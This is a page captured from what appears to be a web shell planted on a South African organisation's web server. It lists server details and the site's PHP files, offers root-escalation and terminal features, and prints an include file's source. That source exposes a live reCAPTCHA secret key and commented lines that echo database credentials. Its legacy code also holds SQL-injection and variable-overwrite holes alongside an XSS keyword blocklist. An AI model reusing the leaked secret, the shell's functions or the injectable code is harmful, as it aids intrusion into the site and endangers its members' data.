Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
php /
Delete
Unzip
Name
Size
Permission
Date
Action
_notes
[ DIR ]
drwxr-sr-x
2022-12-20 11:09
_vti_cnf
[ DIR ]
drwxr-sr-x
2022-12-20 11:09
certificate
[ DIR ]
drwxr-sr-x
2023-03-22 11:22
includes
[ DIR ]
drwxr-sr-x
2026-08-24 10:12
mail_interface
[ DIR ]
drwxr-sr-x
2025-06-14 09:47
security
[ DIR ]
drwxr-sr-x
2023-09-17 08:02
temp
[ DIR ]
drwxr-sr-x
2026-04-18 22:25
templates
[ DIR ]
drwxr-sr-x
2026-05-25 12:12
tests
[ DIR ]
drwxr-sr-x
2025-07-07 15:54
CaptchaSecurityImages.php
2.26
KB
-rw-r--r--
2022-12-20 11:09
Inc_calendarnew.php
8.59
KB
-rw-r--r--
2017-11-20 10:34
accredcourses.php
7.04
KB
-rw-r--r--
2023-08-22 10:55
adecquestionnaire.php
26.54
KB
-rw-r--r--
2025-08-01 10:38
advisory.php
7.21
KB
-rw-r--r--
2022-12-20 11:09
advisory_full.php
1.31
KB
-rw-r--r--
2022-12-20 11:09
annualdeclaration.php
15.28
KB
-rw-r--r--
2026-01-22 10:25
awardsentry.php
14.55
KB
-rw-r--r--
2025-08-01 10:38
awardsentry.php.bak
11.22
KB
-rw-r--r--
2016-04-13 12:45
bookdetail.php
954
B
-rw-r--r--
2022-12-20 11:09
books.php
4.4
KB
-rw-r--r--
2023-05-16 13:08
branchdocuments.php
1.14
KB
-rw-r--r--
2022-12-20 11:09
branches.php
2.82
KB
-rw-r--r--
2025-08-06 12:54
calendarpdf.php
1.75
KB
-rw-r--r--
2025-08-26 16:52
cceregister.php
55.59
KB
-rw-r--r--
2026-08-14 12:05
ccmregister.php
71.57
KB
-rw-r--r--
2022-12-20 11:09
class.phpmailer.php
44.39
KB
-rw-r--r--
2022-12-20 11:09
class.smtp.php
32.74
KB
-rw-r--r--
2022-12-20 11:09
committeedocs.php
932
B
-rw-r--r--
2022-12-20 11:09
committees.php
2.69
KB
-rw-r--r--
2025-08-06 12:58
cpdapply.php
5.73
KB
-rw-r--r--
2022-12-20 11:09
cpdapplyform.php
34.06
KB
-rw-r--r--
2025-08-01 10:38
cpdproviderapply.php
42.09
KB
-rw-r--r--
2026-02-10 10:10
cpdproviderportal.php
79.47
KB
-rw-r--r--
2025-09-08 07:23
cpdspverify.php
4.27
KB
-rw-r--r--
2025-10-10 10:45
cpdtmverify.php
4.45
KB
-rw-r--r--
2023-06-19 13:44
declineeventreg.php
3.73
KB
-rw-r--r--
2022-12-20 11:09
directorybooking.php
7.39
KB
-rw-r--r--
2022-12-20 11:09
downloadPN.php
385
B
-rw-r--r--
2025-06-26 13:02
downloadfile.php
280
B
-rw-r--r--
2025-08-01 10:38
enews.php
1.33
KB
-rw-r--r--
2022-12-20 11:09
enewsarchive.php
1.09
KB
-rw-r--r--
2022-12-20 11:09
event.php
12.39
KB
-rw-r--r--
2026-08-19 12:22
event_allvenues.php
18.93
KB
-rw-r--r--
2026-08-09 11:44
eventdecline_awards.php
11.79
KB
-rw-r--r--
2022-12-20 11:09
eventregister.php
26.85
KB
-rw-r--r--
2026-02-10 07:56
eventregister_awards.php
19.4
KB
-rw-r--r--
2025-06-20 06:38
eventregister_golf.php
28.83
KB
-rw-r--r--
2025-08-19 08:12
eventtables.php
24.13
KB
-rw-r--r--
2023-06-01 09:51
eventtables.php.bak
3.49
KB
-rw-r--r--
2022-12-20 11:09
fidicgama2018.php
1012
B
-rw-r--r--
2022-12-20 11:09
forum.php
3.25
KB
-rw-r--r--
2022-12-20 11:09
getoffices.php
799
B
-rw-r--r--
2022-12-20 11:09
hrforumsubscribe.php
2.62
KB
-rw-r--r--
2022-12-20 11:09
hrforumunsubscribe.php
1.32
KB
-rw-r--r--
2022-12-20 11:09
inc_calendarnew.php
10.56
KB
-rw-r--r--
2025-08-21 10:11
inc_captcha.php
337
B
-rw-r--r--
2022-12-20 11:09
inc_db.php
12.33
KB
-rw-r--r--
2025-06-18 12:05
inc_php7.php
6
KB
-rw-r--r--
2025-07-07 12:51
inc_practicenoteslist.php
4.1
KB
-rw-r--r--
2024-07-03 13:52
inc_scecalendar.php
8.55
KB
-rw-r--r--
2025-06-13 08:57
inc_scecalendar_backup.php
6.66
KB
-rw-r--r--
2022-12-20 11:09
inc_scecalendarnew.php
7.84
KB
-rw-r--r--
2026-05-09 09:39
jobshadowschools.php
7.26
KB
-rw-r--r--
2025-06-20 06:38
logout.php
593
B
-rw-r--r--
2025-02-25 08:19
marketingevent.php
122.75
KB
-rw-r--r--
2026-08-03 13:40
marketingeventdecline.php
15.21
KB
-rw-r--r--
2022-12-20 11:09
marketingsurvey.php
5.95
KB
-rw-r--r--
2022-12-20 11:09
matrixtemplate.htm
2.13
KB
-rw-r--r--
2022-12-20 11:09
member_portal_becs.php
2.14
KB
-rw-r--r--
2025-09-12 07:50
member_portal_transformation.php
10.45
KB
-rw-r--r--
2026-05-20 10:07
member_portal_transformation_proxy.php
538
B
-rw-r--r--
2026-05-20 09:08
memberauth.php
991
B
-rw-r--r--
2025-02-25 08:19
memberportal.php
11.79
KB
-rw-r--r--
2026-05-20 09:54
membersearch.php
22.72
KB
-rw-r--r--
2025-02-27 08:02
membersearch_smme.php
6.2
KB
-rw-r--r--
2024-11-27 11:41
memberverify.php
5.25
KB
-rw-r--r--
2022-12-20 11:09
mentors.php
21.68
KB
-rw-r--r--
2025-06-20 06:38
migratenode.php
1.26
KB
-rw-r--r--
2022-12-20 11:09
monofont.ttf
40.07
KB
-rw-r--r--
2022-12-20 11:09
nlc.php
855
B
-rw-r--r--
2022-12-20 11:09
nlcreports.php
2.51
KB
-rw-r--r--
2022-12-20 11:09
php_errors.log
1.06
KB
-rw-r--r--
2026-08-20 23:37
practicenotes.php
4.63
KB
-rw-r--r--
2022-12-20 11:09
practicenotes_full.php
1.33
KB
-rw-r--r--
2022-12-20 11:09
practicenotes_help.php
2.17
KB
-rw-r--r--
2022-12-20 11:09
practicenotes_list.php
2.03
KB
-rw-r--r--
2024-07-03 13:52
practicenotes_search.php
9.43
KB
-rw-r--r--
2022-12-20 11:09
querynlcmatrix.php
15
KB
-rw-r--r--
2022-12-20 11:09
querynlcmatrix.php4
15.38
KB
-rw-r--r--
2012-03-05 08:01
register.php
58.18
KB
-rw-r--r--
2026-05-26 14:55
relay.php
20.33
KB
-rw-r--r--
2025-06-20 06:38
relayteams.php
12.53
KB
-rw-r--r--
2022-12-20 11:09
resendcpdform.php
7.28
KB
-rw-r--r--
2025-08-01 10:38
retiredeng.php
13.45
KB
-rw-r--r--
2025-06-20 06:38
retiredeng_members.php
1.81
KB
-rw-r--r--
2022-12-20 11:09
sanitize.php
10
B
-rw-r--r--
2022-12-20 11:09
sce_survey2015.php
25.85
KB
-rw-r--r--
2022-12-20 11:09
sceallevents.php
8.13
KB
-rw-r--r--
2026-01-20 08:45
scecalendar.php
4.86
KB
-rw-r--r--
2025-06-18 11:18
scecalendar_backup.php
3.17
KB
-rw-r--r--
2025-06-18 11:18
scecalendarnew.php
5.98
KB
-rw-r--r--
2025-08-28 11:14
scecalendarnewtest.php
5.7
KB
-rw-r--r--
2022-03-04 12:37
scecalendartest.php
3.57
KB
-rw-r--r--
2022-03-04 12:38
scecategories.php
914
B
-rw-r--r--
2022-12-20 11:09
scecourses.php
7.18
KB
-rw-r--r--
2026-08-19 12:15
scelist.php
7.72
KB
-rw-r--r--
2025-08-29 07:18
scesubscribe.php
2.06
KB
-rw-r--r--
2022-12-20 11:09
sceupdate.php
1.67
KB
-rw-r--r--
2025-06-18 11:18
scevenuehire.php
6.15
KB
-rw-r--r--
2026-01-23 13:12
sendeventreg.php
19.5
KB
-rw-r--r--
2026-08-14 12:05
sendeventreg2.php
2.83
KB
-rw-r--r--
2026-07-17 14:57
sendeventreg_golf.php
20.23
KB
-rw-r--r--
2026-08-14 12:05
sendeventreg_golf.php.bak
11.69
KB
-rw-r--r--
2016-09-07 09:48
sendreg.php
35.15
KB
-rw-r--r--
2026-08-14 12:05
smsunsub.php
1.89
KB
-rw-r--r--
2025-06-18 11:18
template.php
54.36
KB
-rw-r--r--
2022-12-20 11:09
tenders.php
1.34
KB
-rw-r--r--
2022-12-20 11:09
trainerportal.php
50.27
KB
-rw-r--r--
2025-08-01 11:06
trainerportal.php.bak
2.57
KB
-rw-r--r--
2022-12-20 11:09
unempgrad_members.php
2.38
KB
-rw-r--r--
2025-06-18 11:18
unemployed.php
14.13
KB
-rw-r--r--
2025-06-20 06:38
unemployedreg.php
23.38
KB
-rw-r--r--
2025-06-20 06:38
unempreg_members.php
2.36
KB
-rw-r--r--
2025-06-18 11:18
ypfbranchcommittee.php
1.63
KB
-rw-r--r--
2022-12-20 11:09
ypfcommittees.php
1.57
KB
-rw-r--r--
2022-12-20 11:09
ypfjoin.php
30.29
KB
-rw-r--r--
2025-07-07 15:53
ypfjoin2.php
28.13
KB
-rw-r--r--
2025-06-18 11:18
ypfjoinmatches.php
9.46
KB
-rw-r--r--
2025-06-18 11:18
ypfmentees.php
20.81
KB
-rw-r--r--
2026-08-24 11:52
ypfmentees_members.php
2.42
KB
-rw-r--r--
2025-06-18 11:18
Save
Rename
<?php include_once("inc_php7.php"); $vatperc = 15; $fifiten5VatDate = new DateTime("2025-05-01 00:00:00"); if ($fifiten5VatDate->getTimestamp() >= time()) { // VAT is still 15% $vatperc = 15; } $incvat = (100 + $vatperc) / 100; include_once($_SERVER['DOCUMENT_ROOT'] . "/cfg/config.php"); // echo 'EW_CONN_HOST: ' . EW_CONN_HOST . '<br>'; // echo 'EW_CONN_USER: ' . EW_CONN_USER . '<br>'; // echo 'EW_CONN_PASS: ' . EW_CONN_PASS . '<br>'; // echo 'EW_CONN_DB: ' . EW_CONN_DB . '<br>'; // echo 'WP_HOST: ' . WP_HOST . '<br>'; // echo 'WPDB_USER: ' . WPDB_USER . '<br>'; // echo 'WPDB_PASS: ' . WPDB_PASS . '<br>'; // echo 'WPDB_DB: ' . WPDB_DB . '<br>'; // echo 'MAILDB_USER: ' . MAILDB_USER . '<br>'; // echo 'MAILDB_PASS: ' . MAILDB_PASS . '<br>'; // exit; $loghost = EW_CONN_HOST; $logid = EW_CONN_USER; $logpwd = EW_CONN_PASS; $dbname = EW_CONN_DB; $host = $loghost; $user = $logid; $password = $logpwd; $db = $dbname; $conni = mysqli_connect($loghost, $logid, $logpwd, $dbname); $conn = mysql_connect($loghost, $logid, $logpwd); mysql_select_db($dbname); extract($_REQUEST); if (!function_exists("LogUserActivity")) { function LogUserActivity($sActivity) { global $conn; $sql = "INSERT INTO user_activity (ContactsID, FirstName, Surname, DateAccessed, Activity, FormParams) VALUES (" . $_SESSION["CID"] . ", '" . mysql_real_escape_string($_SESSION["firstname"]) . "', '" . mysql_real_escape_string($_SESSION["lastname"]) . "', NOW(), '" . mysql_real_escape_string($sActivity) . "', '" . print_r($_POST, true) . "')"; mysql_query($sql); } } //this function drives the two above and generates a mailto link. if label isn't set, it just re-obfuscates the email address and uses that as the label //obfuscate takes a string and replaces most characters with the hexidecimal ordinal equivalent. Note: return string is almost certainly much longer than the original email address if (!function_exists("obfuscate")) { function obfuscate($email) { $i = 0; $obfuscated = ""; while ($i < strlen($email)) { if (rand(0, 2)) { $obfuscated .= '%' . dechex(ord($email[$i])); } else { $obfuscated .= $email[$i]; } $i++; } return $obfuscated; } } if (!function_exists("obfuscate_numeric")) { //obfuscate_numeric takes a string and replaces the characters with html entity eqivalents. You have to do this if you want to obfuscate the label and have it display normally, or if you just want to obfuscate the "mailto" tag. Note: return string is almost certainly much longer than the plaintext string function obfuscate_numeric($plaintext) { $i = 0; $obfuscated = ""; while ($i < strlen($plaintext)) { if (rand(0, 2)) { $obfuscated .= '&#' . ord($plaintext[$i]); } else { $obfuscated .= $plaintext[$i]; } $i++; } return $obfuscated; } } if (!function_exists("generate_obfuscated_mailto")) { function generate_obfuscated_mailto($email, $label = "") { if (empty($label)) $label = $email; return sprintf( "<a href='%s:%s'>%s</a>", obfuscate_numeric('mailto'), obfuscate($email), obfuscate_numeric($label) ); } } if (!function_exists("RemoveXSS")) { function RemoveXSS($val) { // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed // this prevents some character re-spacing such as <java\0script> // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val); // straight replacements, the user should never need these since they're normal characters // this prevents like <IMG SRC=@avascript:alert('XSS')> $search = 'abcdefghijklmnopqrstuvwxyz'; $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; $search .= '1234567890!@#$%^&*()'; $search .= '~`";:?+/={}[]-_|\'\\'; for ($i = 0; $i < strlen($search); $i++) { // ;? matches the ;, which is optional // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars // @ @ search for the hex values $val = preg_replace('/(&#[xX]0{0,8}' . dechex(ord($search[$i])) . ';?)/i', $search[$i], $val); // with a ; // @ @ 0{0,7} matches '0' zero to seven times $val = preg_replace('/(�{0,8}' . ord($search[$i]) . ';?)/', $search[$i], $val); // with a ; } // now the only remaining whitespace attacks are \t, \n, and \r $ra1 = array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base'); $ra2 = array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload'); $ra = array_merge($ra1, $ra2); $found = true; // keep replacing as long as the previous round replaced something while ($found == true) { $val_before = $val; for ($i = 0; $i < sizeof($ra); $i++) { $pattern = '/'; for ($j = 0; $j < strlen($ra[$i]); $j++) { if ($j > 0) { $pattern .= '('; $pattern .= '(&#[xX]0{0,8}([9ab]);)'; $pattern .= '|'; $pattern .= '|(�{0,8}([9|10|13]);)'; $pattern .= ')*'; } $pattern .= $ra[$i][$j]; } $pattern .= '/i'; $replacement = substr($ra[$i], 0, 2) . '<x>' . substr($ra[$i], 2); // add in <> to nerf the tag $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags if ($val_before == $val) { // no replacements were made, so exit the loop $found = false; } } } return $val; } } if (!function_exists("sanitize")) { function sanitize(&$input) { foreach ($input as $key => $value) { $input[$key] = RemoveXSS($value); } } } if (!function_exists("systemerror")) { function systemerror($errortype, $problem, $pageoccurred, $resolution) { $title = "$errortype error"; ?> <html> <head> <title><?php echo $errortype ?></title> </head> <body> <!-- Start Page Content Here --> <table width="700" cellpadding="10" border="0" cellspacing="0"> <tr> <td valign="top"> <div class="outline"> <h3><?php echo $errortype ?></h3> <p> An error has occured</b>: </p> <p> "<?php echo $problem ?>" </p> <p> <?php echo $resolution ?> </p> <p> If you are still having trouble and you are sure this is a valid problem please email <a href="mailto:julia@xe.co.za">julia@xe.co.za</a> with a full description of what you were trying to do and be sure to copy the information on this page. </p> </div> </td> </tr> </table> <!-- End Page Content Here --> </body> </html> <?php die(); } } if (!function_exists("zadate")) { function zadate() { $zadate = gmdate("d F Y", time() + 7200); return $zadate; } } /* * ****************************************************** * To check if a certain field has been filled out. * * usage: checkIt(variable, question number) * * ****************************************************** */ if (!function_exists("checkIt")) { function checkIt($what, $question) { if ($what == '' || strlen($what) < 1) { return false; } else { return true; } //end if else } //end function } /* * ********************************************* * Function to see if a email address can exist * * usage: $bool = checkEmail($email_address) * * ********************************************* */ if (!function_exists("checkEmail")) { function checkEmail($email) { if (eregi("(@.*@)|(\.\.)|(@\.)|(\.@)|(^\.)", $email) || !eregi("^.+\@(\[?)[-a-zA-Z0-9\.]+\.([a-zA-Z]{2,3}|[0-9]{1,3})(\]?)$", $email)) { return false; } else { list($user, $domain) = explode(`@`, $email); if ((!eregi("^[a-zA-Z0-9\.\-]+$", $user)) || (!eregi("^[a-zA-Z0-9\.\-]+$", $domain))) { return false; } else { return true; } //end if else } //end if else } //end function } /* * ************************************** * Function checks to see if there * * are any numbers in a string. * * If there are, return true, else * * return false. * * Usage: if(checkForNumbers(string)) * * ************************************** */ if (!function_exists("checkForNumbers")) { function checkForNumbers($string) { if (ereg("[0-9]", $string) == 0) { return false; } else { return true; } //end if else } //end function } if (!function_exists("log_query")) { function log_query() {} } if (!function_exists("reCaptcha")) { function reCaptcha($sResponse) { // Key: 6LcoIWUrAAAAAKBLHpjS7GyroBey9G6yhilbpyNa // Secret: 6LcoIWUrAAAAANW5m_GMWA9WbBcvOzJkVCO5memV $url = 'https://www.google.com/recaptcha/api/siteverify'; $fields = array( 'secret' => '6LcoIWUrAAAAANW5m_GMWA9WbBcvOzJkVCO5memV', 'response' => $sResponse ); //url-ify the data for the POST $fields_string = ""; foreach ($fields as $key => $value) { $fields_string .= $key . '=' . $value . '&'; } rtrim($fields_string, '&'); //open connection $ch = curl_init(); //set the url, number of POST vars, POST data curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, count($fields)); curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string); //execute post $result = curl_exec($ch); //close connection curl_close($ch); $resultObj = json_decode($result, true); return $resultObj["success"]; } }